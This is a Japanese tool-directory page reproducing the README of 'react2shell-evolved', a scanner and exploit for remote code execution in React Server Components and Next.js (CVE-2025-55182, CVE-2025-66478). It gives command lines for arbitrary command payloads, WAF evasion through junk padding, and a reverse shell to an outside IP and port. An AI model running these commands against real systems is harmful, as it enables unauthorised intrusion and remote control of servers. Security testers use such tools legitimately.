Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
react2shell-evolved — assetnoteのCVE-2025-55182スキャナーの進化版 | Kitploit
ツール/GitHubGitHub/guiimoraes/react2shell-evolved
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用WAFバイパスペネトレーションテストレッドチーミングリモートアクセスツール
GitHubguiimoraes/react2shell-evolved

react2shell-evolved

assetnoteのCVE-2025-55182スキャナーの進化版

リポジトリを見る
217ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

React2Shell Scanner

RSC/Next.js RCE向け高精度検出ツール

React Server ComponentsおよびNext.jsアプリケーションにおけるリモートコード実行(RCE)脆弱性を検出するスキャナ。

概要

React2Shell Scannerは、React Server Components(RSC)およびNext.jsを利用するアプリケーションのリモートコード実行(RCE)脆弱性を識別するための専門ツールです。本ツールは以下のCVEに関連する脆弱性を検出します:

  • CVE-2025-55182
  • CVE-2025-66478

サイドチャネル検出およびRCEの概念実証(PoC)を用いた高精度な検査を実行し、HTTPレスポンスの自動パースを通じて実行されたコマンド結果を動的に抽出する機能を備えています。

本バージョンは、Assetnote Security Research Team が開発したオリジナルスキャナを @imguimoraes が編集したものです。オリジナルのRCE PoCは @maple3142 によって作成されました。

特徴

  • サイドチャネルおよびPoC RCEを使用した高精度検出
  • マルチスレッド実行による大量スキャン
  • 実行されたコマンド結果の動的抽出(レスポンスヘッダーと本文の自動パース)
  • 設定可能なランダムデータによるWAFバイパス
  • Windows(PowerShell)およびLinux/Unix(シェル)に対応
  • 後から解析可能な構造化JSON出力
  • 自動リダイレクト追跡
  • プログレスバーとカラー出力を備えたインターフェース

インストール

必要条件

  • Python 3.8 以上
  • pip(Pythonパッケージマネージャー)

依存関係のインストール

root@kitploit:~
pip install requests tqdm

または requirements.txt ファイルを使用して:

root@kitploit:~
pip install -r requirements.txt

使用方法

基本構文

root@kitploit:~
python scanner.py [-u URL | -l FILE] [オプション]

単一URLの確認

root@kitploit:~
python scanner.py -u https://example.com

複数URLの確認

root@kitploit:~
python scanner.py -l hosts.txt

コマンドラインオプション

入力オプション(どちらか必須)

オプション説明
-u, --url URLチェック対象のURLまたはホスト(単一)
-l, --list FILEホストリストを含むファイル(1行1ホスト)

実行オプション

オプション説明
-t, --threads N同時スレッド数(デフォルト:10)
--timeout SECONDSリクエストのタイムアウト(秒)(デフォルト:10)
-k, --insecureSSL証明書検証を無効にする(デフォルトで有効)

出力オプション

ヘッダーオプション

オプション説明
-H, --header "Key: Value"カスタムHTTPヘッダーを追加(複数回使用可)

エクスプロイトオプション

使用例

例1:ホストの基本スキャン

root@kitploit:~
python scanner.py -u https://target.com

例2:複数スレッドを使用した大量スキャン

root@kitploit:~
python scanner.py -l targets.txt -t 50 --timeout 15

例3:JSON出力を使用したスキャン

root@kitploit:~
python scanner.py -l targets.txt -o results.json --all-results

例4:カスタムヘッダーを使用したスキャン

root@kitploit:~
python scanner.py -u https://target.com -H "Authorization: Bearer token" -H "User-Agent: CustomAgent"

例5:カスタムペイロードを使用したスキャン

root@kitploit:~
python scanner.py -u https://target.com --payload "whoami"

例6:WAFバイパスを使用したスキャン

root@kitploit:~
python scanner.py -l targets.txt --waf-bypass --waf-bypass-size 256

例7:Windows環境でのスキャン

root@kitploit:~
python scanner.py -u https://target.com --windows --payload "whoami"

例8:セーフチェックを使用したスキャン(非侵襲)

root@kitploit:~
python scanner.py -l targets.txt --safe-check

例9:完全冗長スキャン

root@kitploit:~
python scanner.py -l targets.txt -v --all-results -o full_scan.json

例10:リバースシェルを確立

root@kitploit:~
python scanner.py -u https://target.com --reverse-shell 192.168.1.100:4444

出力形式

ターミナル出力

スキャナーはステータスを示すカラーコード付きで結果を表示します:

  • [VULNERABLE] - 脆弱(赤)
  • [NOT VULNERABLE] - 脆弱ではない(緑)
  • [ERROR] - チェック中にエラー(黄)

脆弱なホストの場合、利用可能であれば、X-Action-Redirect ヘッダーまたはレスポンス本文の自動抽出を通じて、実行されたコマンドの結果が表示されます。

JSON形式

-o オプションを使用すると、次の構造のJSON形式で出力がファイルに保存されます:

root@kitploit:~
{
  "scan_time": "2025-01-XXT00:00:00.000000Z",
  "total_results": 10,
  "results": [
    {
      "host": "https://target.com",
      "vulnerable": true,
      "status_code": 307,
      "final_url": "https://target.com/",
      "command_result": "11111",
      "timestamp": "2025-01-XXT00:00:00.000000Z",
      "request": "POST / HTTP/1.1\r\n...",
      "response": "HTTP/1.1 307 Temporary Redirect\r\n...",
      "error": null
    }
  ]
}

結果フィールド:

  • vulnerable: 脆弱ならtrue、脆弱でなければfalse、エラー発生時はnull
  • command_result: レスポンスから抽出された実行コマンドの結果(利用可能な場合)
  • final_url: テストされた最終URL(リダイレクト追跡が有効な場合)
  • status_code: レスポンスのHTTPステータスコード
  • request: 送信された完全なHTTPリクエスト
  • response: 受信したHTTPレスポンス(最初の2000文字)
  • error: エラーがあればそのメッセージ
  • timestamp: チェックのUTCタイムスタンプ

技術的特徴

検出方法

本スキャナーは2つの検出方法を提供します:

  1. セーフチェック(--safe-check):コードを実行せずにレスポンスのエラーパターンを確認する、非侵襲的なサイドチャネル検出。影響のない初期スキャンに便利です。

  2. RCE PoC:結果の動的抽出を伴う実際のリモートコード実行。Node.jsの子プロセスを利用したシステムコマンド実行ペイロードを使用します。

結果の抽出

本スキャナーはHTTPレスポンスを自動パースして、実行されたコマンドの結果を抽出します:

  • X-Action-Redirect ヘッダーからの抽出(形式:NEXT_REDIRECT;push;/login?a=<result>;307;)
  • レスポンス本文からの抽出(形式:E{"digest":"<result>"} または 1:E{"digest":"<result>"})
  • --payload パラメータを使用した任意のカスタムコマンド/ペイロードで動作します。

抽出は動的に行われ、固定値に依存しないため、任意のコマンド実行を検証できます。

WAFバイパス

--waf-bypass オプションが使用された場合:

  • multipart/form-data ペイロードの先頭にランダムデータ(ジャンクデータ)を追加
  • --waf-bypass-size でサイズを設定可能(デフォルト:128KB)
  • リクエスト本文の内容を検査するWAFフィルターを回避するのに有効
  • WAFバイパスが有効な場合、タイムアウトは自動的に20秒に増加

カスタムペイロード

--payload パラメータを使用すると、任意のコマンドを指定して実行できます:

  • デフォルト:echo $((41*271))(結果:11111)
  • Windows:--windows が有効な場合、PowerShellコマンドを使用
  • Linux/Unix:標準のシェルコマンドを使用

コマンドの結果は、戻り値に関わらず自動的に抽出されて表示されます。

リバースシェル

--reverse-shell オプションを使用すると、リバースシェル接続を確立できます:

  • 形式:IP:PORT(例:192.168.1.100:4444)
  • Node.jsのnetおよびchild_processモジュールを使用
  • Windowsの場合:powershell.exe を起動
  • Linux/Unixの場合:/bin/sh を起動

法的および倫理的注意事項

このツールは教育目的および許可されたセキュリティテストのためにのみ使用されることを意図しています。

  • 自分が所有しているか、書面による明示的な許可を得たシステムでのみ使用してください
  • 許可なくこのツールを使用することは違法であり、刑事責任を問われる可能性があります
  • 開発者はこのツールの不正使用に対していかなる責任も負いません
  • ペネトレーションテストを実施する前に必ず書面による許可を取得してください
  • 管轄区域の適用される法律および規制を尊重してください

クレジット

オリジナルエクスプロイト

オリジナルのRCEエクスプロイトは @maple3142 によって作成されました。

オリジナルスキャナー

オリジナルスキャナーは Assetnote Security Research Team によって開発されました:

  • リポジトリ:https://github.com/assetnote/react2shell-scanner/
  • ウェブサイト:https://www.assetnote.io/

このバージョン

この編集バージョンは、オリジナルスキャナーの機能を維持しつつ、以下の追加改良を施しています:

  • コマンド結果の動的抽出(レスポンスの自動パース)
  • 結果抽出を伴うカスタムコマンドのサポート
  • Vercel Bypassの削除(??/??/2025にパッチ済み)
  • リバースシェルシステム(クラッシュ耐性)

編集者:guiimoraes

関連CVE

  • CVE-2025-55182
  • CVE-2025-66478

バグを見つけた場合や改善の提案がある場合は、問題の詳細を記述してリポジトリにIssueを開いてください。

ツールをダウンロード
オプション説明
-o, --output FILEJSON形式の結果出力ファイル
--all-results脆弱なものだけでなく全ての結果をファイルに保存
-v, --verbose冗長出力(分析用にレスポンススニペットを表示)
-q, --quietサイレントモード(脆弱なホストのみ表示)
--no-colorカラー出力を無効にする
オプション説明
--safe-checkRCE PoCではなく安全なサイドチャネル検出を使用(コードを実行しない)
--windowsUnixシェルではなくPowerShellペイロードを使用(Windows環境向け)
--waf-bypassペイロードにランダムデータを追加してWAFをバイパス(デフォルト:128KB)
--waf-bypass-size KBWAFバイパス用ランダムデータのサイズ(KB)(デフォルト:128)
--payload COMMANDRCEで実行するカスタムコマンド(デフォルト:echo $((41*271)))
--reverse-shell IP:PORT指定されたIP:PORTへのリバースシェル接続を作成